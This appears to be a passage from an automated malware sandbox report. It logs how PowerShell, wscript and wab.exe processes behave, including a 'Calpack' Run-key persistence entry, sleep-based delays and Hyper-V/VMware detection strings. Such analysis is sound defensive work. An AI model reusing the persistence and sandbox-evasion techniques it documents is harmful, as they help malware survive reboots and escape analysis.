              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA56003 pushad ; iretd 1_2_00007FFD9BA56049
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA50000 pushad ; iretd 1_2_00007FFD9BA50001
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA515F0 pushad ; iretd 1_2_00007FFD9BA515F9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA55BE9 pushad ; iretd 1_2_00007FFD9BA55BF1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA56458 pushad ; iretd 1_2_00007FFD9BA56471
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA5323E pushad ; iretd 1_2_00007FFD9BA53281
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA54C49 pushad ; iretd 1_2_00007FFD9BA54D21
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA50C48 pushad ; iretd 1_2_00007FFD9BA50C49
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA53A28 pushad ; iretd 1_2_00007FFD9BA53A29
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA56991 pushad ; iretd 1_2_00007FFD9BA569A1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA52F95 pushad ; iretd 1_2_00007FFD9BA53001
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA52785 pushad ; iretd 1_2_00007FFD9BA527C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA5176D pushad ; iretd 1_2_00007FFD9BA517B1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA50969 pushad ; iretd 1_2_00007FFD9BA509A9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA547D1 pushad ; iretd 1_2_00007FFD9BA54811
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA55DD3 pushad ; iretd 1_2_00007FFD9BA55E19
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA501D0 pushad ; iretd 1_2_00007FFD9BA501D1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA507C9 pushad ; iretd 1_2_00007FFD9BA50809
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA551C5 pushad ; iretd 1_2_00007FFD9BA55201
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA52BB4 push 6000002Ch; iretd 1_2_00007FFD9BA52CD9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA535BB pushad ; iretd 1_2_00007FFD9BA535E1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA523B5 pushad ; iretd 1_2_00007FFD9BA523F9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA503B8 pushad ; iretd 1_2_00007FFD9BA503B9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA5639F pushad ; iretd 1_2_00007FFD9BA563B9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA513A0 pushad ; iretd 1_2_00007FFD9BA513A9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA50118 pushad ; iretd 1_2_00007FFD9BA50119
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA556DD pushad ; iretd 1_2_00007FFD9BA556E1
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CalpackJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CalpackJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4490Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5327Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5374Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3423Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5571Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 7028Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep count: 5374 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep count: 4477 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2692Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 348Thread sleep count: 3423 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4364Thread sleep count: 155 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4364Thread sleep time: -465000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4364Thread sleep count: 5571 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4364Thread sleep time: -16713000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3423 delay: -5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wscript.exe, 00000000.00000003.1697548908.0000027B9DE13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicshutdownvmicshutdownUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemJONES-PCvmicshutdown
              Source: wscript.exe, 00000000.00000003.1697957289.0000027B9DEE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1696145143.0000027B9DED5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1696468232.0000027B9DEE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1699596963.0000027B9DEE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
              Source: powershell.exe, 00000001.00000002.2410247174.000001E3D898A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAAA
              Source: wscript.exe, 00000000.00000003.1697548908.0000027B9DE13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
              Source: wscript.exe, 00000000.00000002.1699489398.0000027B9DEC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\{
